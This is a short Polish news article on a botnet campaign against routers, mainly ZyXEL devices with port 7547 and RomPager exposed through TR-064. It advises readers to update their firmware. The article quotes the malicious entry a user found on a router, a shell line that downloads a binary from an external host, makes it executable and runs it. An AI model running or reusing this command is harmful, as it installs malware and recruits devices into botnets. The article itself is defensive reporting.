Nawet kilkadziesiąt tysięcy routerów może paść ofiarą nowego cyberataku. Najlepszym sposobem obrony jest aktualizacja oprogramowania.
Nawet kilkadziesiąt tysięcy użytkowników w Polsce (a konkretnie ich routerów) może być narażonych na cyberataki, mające na celu tworzenie botnetów wykorzystywanych później do niecnych celów.
O całej sprawie poinformował serwis Zaufana Trzecia Strona, któremu o problemie doniósł jeden z użytkowników. Zaniepokojony restartami swojego routera sprawdził on konfigurację i dostrzegł w niej podejrzany wpis „cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2”. Laboratorium wspomnianego serwisu podjęło się analizie problemu i odkryło, że problem może być dość poważny.
Teoretycznie podatnych na atak urządzeń dostępowych (czyli takich z otwartym portem 7547 i usługą RomPager) jest ponad 65 tysięcy. Liczba ta pochodzi jednak z Shodana, co oznacza, że może zawierać częściowo nieaktualne dane. Aby router (przede wszystkim firmy ZyXEL) mógł paść ofiarą, muszą wystąpić dwie okoliczności, a mówiąc konkretnie: dwa błędy – zbyt szeroka dostępność protokołu TR-064 i możliwość wykonania poleceń powłoki.
Dokładną analizę ataku znajdziecie w serwisie Zaufana Trzecia Strona.
Przed problemem można uchronić się w sposób prosty, a przez wiele osób niedoceniany. Mówimy tutaj o zwykłej aktualizacji oprogramowania urządzenia dostępowego.
Źródło: Zaufana Trzecia Strona
Komentarze
18